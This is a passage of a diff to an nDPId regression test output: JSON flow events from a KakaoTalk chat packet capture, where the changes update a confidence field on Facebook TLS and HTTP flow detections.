CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7580000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} @@ -158,21 +158,21 @@ 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} 